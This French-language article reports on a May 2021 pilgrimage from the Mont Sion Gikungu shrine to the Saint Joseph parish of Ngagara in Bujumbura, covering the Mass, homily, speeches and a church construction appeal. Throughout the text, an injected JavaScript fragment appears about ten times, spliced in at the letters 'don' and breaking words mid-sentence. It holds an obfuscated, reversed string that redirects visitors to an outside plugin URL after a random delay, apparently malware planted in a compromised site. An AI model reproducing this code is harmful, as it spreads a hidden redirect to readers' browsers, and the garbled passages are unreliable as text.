Après que le Pape François ait solennellement proclamé que l’année 2021 est dédiée à Saint Joseph, Les chrétiens du Sanctuaire Marial de la Paix et la Réconciliation de Mont Sion Gikungu ont pensé effectuer un pèlerinage à la Paroisse Saint Joseph de Ngagara dans l’Archidiocèse de Bujumbura. Leur souhait a été mis en exécution ce dimanche 9 Mai 2021. Seulement, suite au contexte peu favorable dû aux mesures sanitaires de prévention et de protection des personnes contre la propagation de la pandémie de la covid-19, tous les fidèles qui désiraient faire ce pèlerinage n’ont pas été autorisées à y participer, ils ont été représentés par certains membres du Conseil Elargi des Pèlerins du même Sanctuaire. Après leur rassemblement au Sanctuaire pour la bénédiction, ces fidèles, accompagnés par le Recteur du Sanctuaire, Père Herménégilde Coyitungiye et le Diacre Japhet Simbizi, ont quitté Mont Sion à 10h20 minutes pour âtre sûrs d’être bien à l’heure dans la sainte Messe de 11h à Ngagara.

La célébration eucharistique a été présidée par e curé de la Paroisse, Abbé Déogratias Bizimana en compagnie du Père Recteur du Sanctuaire de Mont Sion Gikungu et de Monseigneur Antoine Madraga, Ancien Vicaire épiscopale du Diocèse de Ngozi. La chorale Lumen Cantorum de Ngagara a aidé dans l’animation du chant liturgique. Les lectures du jour ont été respectivement tirées du Livre des Actes des Apôtres (10. 25-26. 34-35. 44-48), de la deuxième Epitre de Saint Jean (4, 7-10) et l’Evangile selon Saint Jean (15, 9-17). Dans un petit mot d’accueil au début de la Messe, le Curé de la paroisse a souhaité la bienvenue aux pèlerins et à Monseigneur Antoine Madaraga Curé de la paroisse Rusuguti dans le Diocèse Ngozi.  Les Saintes Ecritures du jour nous rappellent le commandement que Jésus a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné ses disciples, « Aimez-vous les uns les autres comme je vous ai aimés », et de rappeler que nous, disciples d’aujourd’hui, sommes appelés à aller témoigner de cet amour dans nos entourages.

Homélie

Dans son homélie, Abbé Déogratias a rappelé que nous sommes toujours dans la joie pascale, dans cette période de 50 jours après Pâques et que c’était encore une fois une occasion de nous rassembler ce jour pour célébrer la résurrection de notre Seigneur et proclamer notre foi. « Après sa résurrection, Jésus s’est montré a ses disciples et chaque fois Il les saluait en disant « La paix soit avec vous » (Jn 20, 19), et il leur a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné le pouvoir de partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner les péchés, le pouvoir sur les démons, et ce pouvoir a été passé à l’Eglise : chasser les démons, guérir les malades et proclamer que Jésus Christ est le seul Rédempteur et Sauveur du monde.  Nous devons alors nous émerveiller de comment Dieu nous a aimés par sa rédemption en Jésus Christ, qui a beaucoup souffert, qui a crié sur la croix pour racheter l’humanité. C’est ce Jésus Christ que nous célébrons dans le Saint Sacrement, il est vivant pour toujours. Est comme le serviteur s’identifie toujours à son maître, nous avons nous aussi la garantie de la vie éternelle.  Et comme nous avons compris comment Dieu nous a tant aimés, nous devons vivre selon sa miséricorde et son amour en nous basant sur deux Paroles de Jésus :

  1. « Voici mon commandement : aimez-vous les uns les autres comme je vous ai aimés » (Jn15, 12). Aimer n’est pas toujours facile, mais c’est possible. Il y a des gens très difficiles à aimer, mais nous sommes appelés à les aimer.  Dans la première lecture, nous comprenons comment le pouvoir que l’Eglise a reçu de Jésus, Pierre l’exerce même sur les païens en les baptisant, sans autres considérations. Et Saint Paul nous montre dans Ephésien3, comment entretenir cet amour. Il y a quatre piliers très essentiels : la Vérité, l’Amour, la Justice et la Sainteté. Les quatres piliers toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent être au complet, comme une chaise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit avoir quatre pieds pour mieux garder l’équilibre.  Dans notre vie nous devons toujours vérifier comment nous vivons chaque pilier.
  2. « Ce n’est vous qui m’avez choisi, c’est moi qui vous ai choisis et institués pour que vous alliez, que vous portiez du fruit et que votre fruit demeure : si bien que tout ce que vous demanderez au Père en mon nom, Il vous l’accordera» (Jn 15, 16).  Dans le Livre des Actes des Apôtres Jésus dit à ses disciples quand vous aurez l’Esprit Saint vous allez témoigner pour moi en commençant par Jérusalem, la Judée jusqu’en Samarie (vos ennemis).  Nous avons entendu comment Pierre se joint aux païens, comment ils reçoivent l’Esprit-Saint et comment il les a baptisés. L’Eglise a ce pouvoir.  Il faut nous rappeler que là où deux ou trois personnes se rassemblent au nom de Jésus, Il est au milieu d’eux. Dans nos groupes de prières, quand nous sommes en droiture avec Dieu, l’Esprit Saint se manifeste, les maladies soient guéries et les miracles soient accomplis.

Ces derniers jours le monde change rapidement, on voit pourtant que les gens se préoccupent des richesses matérielles, des plaisirs de la chair, etc. Il faut faire attention puisque, ayant intronisé Jésus comme Roi de et Rédempteur de ta vie, il y a des choses qu’on toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner. Et pour des Chrétiens, ce qui est important ce ne sont pas les paroles, mais surtout le comportement. Des fois les Chrétiens pensent que c’est fini avec la fin de la messe.  Mais c’est plutôt un début, pour aller montrer que Jésus demeure en nous, pour que les autres voient un bon exemple en nous. Et il faut toujours avoir confiance. Quand Joseph était dans des moments difficiles, il a entendu une voix disant « Ne crains pas » (Mt1, 20). Il ne faut pas avoir peur de quoi que ce soit dans la vie : manque de travail, pauvreté, etc. tant que Jésus est toujours au trône, tout est encore possible.

Abbé Déogratias a terminé l’homélie en rappelant les Chrétiens que l’amour a deux branches : branche verticale qui nous relie à Dieu, et la branche horizontale qui nous relie à nos prochains. « Nous devons aimer notre prochain tel qu’il est tout comme Jésus Lui-même n’a pas regardé nos péchés pour nous aimer », a-t- il exhorté. Il a aussi rappelé que le Pape nous a particulièrement exhortés, pendant l’année de la miséricorde divine en 2016, à nous efforcer à aimer les gens difficiles à aimer. Et d’appeler à implorer le Saint Esprit pour qu’Il  nous comble  de sa force et de ses biens. Amen !

Mot du Recteur à la fin de la Messe

Tugire Yezu, Mariya na Yozefu (Ayons Jesus, Marie et Joseph), par ces mots Père Recteur Herménégilde Coyitungiye a d’abord salué les Chrétiens présents. Il a alors annoncé que c’était une grande joie pour les chrétiens de Mont Sion puisqu’ils avaient un fait ce pèlerinage, mais la pandémie de la covid-19 a fait que seulement un nombre réduit vienne, représenté par le conseil élargi des pèlerins. Il a alors fait savoir que l’apostolat de ce conseil est d’aider les pèlerins qui se rendent au Sanctuaire.  Pourtant ce jour ils ont voulu être pèlerins à leur tour, étant tout d’abord inspirés par la Vierge Marie elle-même Pèlerine dans les ménages comme quand elle se rendait à Elizabeth et dans beaucoup d’autres pèlerinages qu’elle faisait régulièrement notamment à Jérusalem, comme l’Evangile selon saint Luc nous le fait savoir.

Il a fait savoir que cette idée de faire un pèlerinage à la Paroisse Saint Joseph de Ngagara était née le 8 Décembre 2020, le jour où le Pape François a déclaré l’année de Saint Joseph, quand l’Eglise commémorait 150 ans depuis que Saint Joseph était déclaré Patron de l’Eglise Universelle. Le Sanctuaire Marial de Mont Sion a ensuite décidé que depuis le 20 Mars 2021, l’image de Saint Joseph arbore les murs du Sanctuaire.Père Recteur a déclaré qu’on s’attend à recevoir des grâces abondantes dans cette année de Joseph, pas seulement pour ceux qui ont choisi Joseph comme leur patron, mais pour toute l’Eglise. Nous sommes venus alors puiser à la source, dans ce mois de Marie, dans l’année de Joseph.  « Nous nous sentons alors très à l’aise entre nos deux parents, entre Maman et Papa », a-t- il martelé.

Il a précisé que ce n’était pas la première fois que les chrétiens du Sanctuaire de Mont Sion Gikungu faisaient pèlerinage à la Paroisse Saint Joseph, puisque en 2009, l’année de couronnement de la Vierge, on avait aussi fait un pèlerinage à cette Paroisse. Il a rappelé que c’était d’ailleurs visiter un parent puisqu’avant la naissance de la Paroisse Saint Jean Baptiste de Gihosha, Mont Sion Gikungu appartenait à la paroisse Saint Joseph. Père Herménégilde a dit qu’un pèlerin part toujours avec deux choses : la prière et un cadeau et il a alors présenté des cadeaux au curé : l’image de la Vierge Marie Trois Admirable de Schoenstatt et une enveloppe pour une contribution à la construction de l’église, comme par coïncidence, c’était d’ailleurs le deuxième dimanche où les Chrétiens de la Paroisse sont appelés à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner leurs contributions pour la construction leur nouvelle église paroissiale.   Il a ensuite déclaré que le cadeau le plus précieux que les chrétiens du Sanctuaire ont pour la paroisse c’est la prière.

Il a terminé son petit mot par une prière que cette année, avec l’aide de Joseph avec Marie, Marie faisant ce qu’elle a fait à Cana, Galilée, la construction soit terminée. Il a aussi appelé les chrétiens du Sanctuaire qu’à chaque fois qu’ils offriront leurs offrandes dans le Sanctuaire, ils n’oublieront pas la paroisse et ses travaux de construction. Et de prier, « Que les prières que nous adressons à Dieu en passant par Marie et Joseph soient exaucées dans nos familles et paroisses, Amen » !

Au nom de la paroisse Saint Joseph, le Curé Abbé Déogratias Bizimana, a exprimé sa joie d’accueillir les enfants de Marie venus visiter les enfants de Joseph.  Il a alors dit que faire un pèlerinage c’est aller rencontrer Dieu de manière spéciale et recevoir les grâces ; et que ce n’est pas la distance qui compte, mais le cœur avec lequel cette distance est parcourue. Il a exprimé ses remerciements pour la promesse de la prière par les chrétiens du Sanctuaire, et les cadeaux.  Il a aussi apprécié la façon traditionnelle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont les pèlerins avaient offert des offrandes en nature dans des paniers.  Il a particulièrement remercié le Père Recteur du Sanctuaire pour avoir eu l’idée de se faire accompagner non seulement par un diacre et des religieuses mais aussi les autres chrétiens laïcs, montrant ainsi que l’Eglise est faite des prêtres, religieux mais aussi des Laïcs.

Le curé a alors brièvement parlé de la construction de l’église de la paroisse Saint Joseph, disant que maintenant les travaux sont en suspens puisqu’on attend que les fonds soient au complet pour mettre la charpente. Il a dit qu’en plus de plus d’un milliard trois cent million déjà dépensés, on a encore besoin de plus de 700 million pour la charpente et la toiture, et que dans les caisses de la paroisse on a trois cent million, ce qui est bon signe et dénote la détermination des paroissiens.  Il a fait savoir qu’on est en train de faire des calculs, et qu’ils sont très satisfaits du pas déjà franchi et gardent espoir.  Il a terminé en remerciant et souhaitant aux pèlerins de recevoir les grâces qu’ils sont venus chercher, et promettant qu’un jour les Chrétiens de la Paroisse Saint Joseph eux aussi feront aussi un pèlerinage pareil au Sanctuaire de Mont Sion.  Il n’a pas oublié de remercier l’autre visiteur de marque, Monseigneur Antoine Madaraga qui a concélébré à la messe, et qui souvent rend visite la paroisse.

Fulgence Ndayizeye